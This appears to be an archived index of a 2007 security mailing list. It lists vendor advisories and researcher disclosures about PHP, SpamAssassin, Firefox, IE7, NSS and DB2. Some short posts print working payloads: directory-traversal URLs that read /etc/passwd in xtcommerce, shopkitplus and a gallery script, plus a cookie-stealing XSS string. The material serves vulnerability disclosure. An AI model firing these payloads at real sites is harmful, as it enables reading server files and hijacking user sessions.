[ MDKSA-2007:048 ] - Updated php packages fix multiple vulnerabilities

2007-02-23 Thread security
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:048 http://www.mandriva.com/security/ ___

Stack Overflow in Third-Party ActiveX Controls affects Multiple Vendor Products Including Some Symantec Consumer Products and Automated Support

2007-02-23 Thread secure
Symantec Security Advisory SYM07-002 http://www.symantec.com/avcenter/security/Content/2007.02.22.html BID 22564 22 Feb, 2007 Stack Overflow in Third-Party ActiveX Controls affects Multiple Vendor Products Including Some Symantec Consumer Products and Automated Support Assistant Revision Hist

xtcommerce local file include

2007-02-23 Thread none
xtcommerce local file include local file include: /index.php?currency=EUR&manufacturers_id=1&template=../../../../../../../../etc/passwd%00 regards laurent gaffié

Re: Re: SYMSA-2007-002: Palm OS Treo Find Feature System Password Bypass

2007-02-23 Thread chgsupra1
You can view only a prefix or header of the memo/document/calendar...etc, but not the complete content. The edit/paste feature is only for the Find window. There is no short cut to open and view the contents of a document/memo...etc, when the phone is locked. I can understand why Palm does not

[ MDKSA-2007:049 ] - Updated spamassassin packages fix DoS vulnerability

2007-02-23 Thread security
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:049 http://www.mandriva.com/security/ ___

Simple one-file gallery

2007-02-23 Thread none
local file include: /gallery.php?f=../../../../../../../../../../../../etc/passwd xss via php error : /gallery.php?f='">alert(document.cookie) regards laurent gaffié

shopkitplus local file include

2007-02-23 Thread none
lfi: /shopkitplus/enc/stylecss.php?changetheme=../../../../../../../../../../../../etc/passwd full path: /shopkitplus/events.php?curmonth[]=01 /shopkitplus/enc/stylecss.php?changetheme[]= regards laurent gaffié

Advisory 03/2007: Multiple Browsers Cross Domain Charset Inheritance Vulnerability

2007-02-23 Thread Stefan Esser
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hardened-PHP Project www.hardened-php.net -= Security Advisory =- Advisory: Multiple Browsers Cross Domain Charset Inheritance Vulnerability Release Date: 2007/02/23 Last

Secunia Research: Internet Explorer 7 "onunload" Event Spoofing Vulnerability

2007-02-23 Thread Secunia Research
== Secunia Research 23/02/2007 - Internet Explorer 7 "onunload" Event Spoofing Vulnerability - == Table of Conte

rPSA-2007-0038-1 spamassassin

2007-02-23 Thread rPath Update Announcements
rPath Security Advisory: 2007-0038-1 Published: 2007-02-23 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Remote Deterministic Denial of Service Updated Versions: spamassassin=/[EMAIL PROTECTED]:devel//1/3.1.8-0.1-1 References: http://www.cve.mitre.org/cgi-bin/cve

MSIE7 browser entrapment vulnerability (probably Firefox, too)

2007-02-23 Thread Michal Zalewski
There is a cool combination-type vulnerability in MSIE7 that allows the attacker to: a) Trap the visitor in a Matrix-esque tarpit webpage that cannot be left by normal means (this is a known brain-damaged design of onUnload Javascript handlers), b) Spoof transitions between pages so

iDefense Security Advisory 02.23.07: Mozilla Network Security Services SSLv2 Server Stack Overflow Vulnerability

2007-02-23 Thread iDefense Labs
Mozilla Network Security Services SSLv2 Client Integer Underflow Vulnerability iDefense Security Advisory 02.23.07 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 23, 2007 I. BACKGROUND Network Security Services (NSS) is a set of libraries designed to support cross-platform developmen

Re: JBoss jmx-console CSRF

2007-02-23 Thread pagvac
Hey dude! What's the authentication mechanism used by JBoss console? A login HTML form, or HTTP basic auth? If it's the first one and cookies are used as session tokens your exploit should work (the web browser will submit the cookie to the target IP/domain when the evil page is visited). Althou

Firefox Cache Hack - Firefox History Hack redux

2007-02-23 Thread pdp (architect)
http://www.gnucitizen.org/projects/hscan-redux/ Inspired by Michal Zalewski recent Firefox bug hunt, I decided to give it a go and see what I can come up with. We all know how vulnerable Firefox and other browsers are. This is the reason why I am not particularly interested in finding specific br

iDefense Security Advisory 02.23.07: Mozilla Network Security Services SSLv2 Client Integer Underflow Vulnerability

2007-02-23 Thread iDefense Labs
Mozilla Network Security Services SSLv2 Client Integer Underflow Vulnerability iDefense Security Advisory 02.23.07 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 23, 2007 I. BACKGROUND Network Security Services (NSS) is a set of libraries designed to support cross-platform developmen

FlashGameScript v1.5.4 Remote File Inclusion Vulnerability

2007-02-23 Thread malic89
Author: JuMp-Er Date: Feb 21st, 2007 Level: Dangerous Contact: aH-crew[at]hotmail[dot]com Software description --

rPSA-2007-0036-1 kernel

2007-02-23 Thread rPath Update Announcements
rPath Security Advisory: 2007-0036-1 Published: 2007-02-23 Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Remote User Deterministic Denial of Service Updated Versions: kernel=/[EMAIL PROTECTED]:devel//1/2.6.19.4-0.1-1 References: http://www.cve.mitre.org/cgi-bin/

Re: [Full-disclosure] Firefox bookmark cross-domain surfing vulnerability

2007-02-23 Thread pdp (architect)
Michal, is that a feature or a bug? Maybe it is not obvious to me what you are doing, but I feel that it is almost like asking the user to bookmark a bookmarklet. Of course it is a security problem if you execute an untrusted bookmarklet on a page :). On 2/21/07, Michal Zalewski <[EMAIL PROTECTED]

[USN-427-1] enigmail vulnerability

2007-02-23 Thread Martin Pitt
=== Ubuntu Security Notice USN-427-1 February 23, 2007 enigmail vulnerability CVE-2006-5877 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06

Firefox onUnload + document.write() memory corruption vulnerability (MSIE7 null ptr)

2007-02-23 Thread Michal Zalewski
While researching my previous report on MSIE7 browser entrapment, I noticed that Firefox is susceptible to a pretty nasty, and apparently easily exploitable memory corruption vulnerability. When a location transition occurs and the structure of a document is modified from within onUnload event hand

[OpenPKG-SA-2007.010] OpenPKG Security Advisory (php)

2007-02-23 Thread OpenPKG GmbH
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Publisher Name: OpenPKG GmbH Publisher Home: http://openpkg.com/ Advisory Id (public): OpenPKG-SA-2007.010 Advisory Type: OpenPKG Security Adv

Re: [ECHO_ADV_66$2007] SendStudio <= 2004.14 Remote File Inclusion Vulnerability

2007-02-23 Thread Chris Smith
[EMAIL PROTECTED] wrote: ECHO_ADV_66$2007 - [ECHO_ADV_66$2007] SendStudio <= 2004.14 Remote File Inclusion Vulnerability ---

Re: [Full-disclosure] Firefox Cache Hack - Firefox History Hack redux

2007-02-23 Thread Ben Bucksch
pdp (architect) wrote: it tells you which URLs you have attended during the current browser session Filed bug It seems you can only test for specific URLs, not really getting the list. See also bug

iDefense Security Advisory 02.22.07: IBM DB2 Universal Database Multiple Privilege Escalation Vulnerabilities

2007-02-23 Thread iDefense Labs
IBM DB2 Universal Database Multiple Privilege Escalation Vulnerabilities iDefense Security Advisory 02.22.07 http://labs.idefense.com/intelligence/vulnerabilities/ Feb 22, 2007 I. BACKGROUND IBM Corp.'s DB2 Universal Database product is a large database server product commonly used for higher en

Firefox: onUnload tailgating (MSIE7 entrapment bug variant)

2007-02-23 Thread Michal Zalewski
On Fri, 23 Feb 2007, Michal Zalewski wrote: > Firefox isn't outright vulnerable to this problem, but judging from its > behavior, it is likely to be susceptible to a variant of this bug And indeed, susceptible it is. On the surface, the problem is even more serious: the unloaded page can run Java

Re: Web Apps- Rad Upload Version 3.02 Remote File Include Vulnerability

2007-02-23 Thread e4c5
1) Obviously the poster is unaware that PHP register_globals have been off for a long long time and thus a value of the save_path cannot be passed in through the url as described by the poster. http://au2.php.net/manual/en/security.globals.php 2) He has failed to notice the $save_path is set wit

RE: Overtaking Google Desktop

2007-02-23 Thread Yair Amit
In November of 2005, Matan Gillon discovered a vulnerability in Internet Explorer in the way it handled the CSS import directive (http://www.hacker.co.il/security/ie/css_import.html). He proved the danger of the IE vulnerability by attacking Google Desktop. This proof of concept proved a powerfu

RE: Re[2]: Solaris telnet vulnerability - how many on your network?

2007-02-23 Thread Roger A. Grimes
Fun ole exploit. Of course, it doesn't have to be C's. I use numbers 1-9 and 0, repeated so it's easier to count 64 characters. It can be nearly any character, as long as you have the spaces in between. It doesn't even have to be 64 characters all the time, but it normally has to be 64 or slightly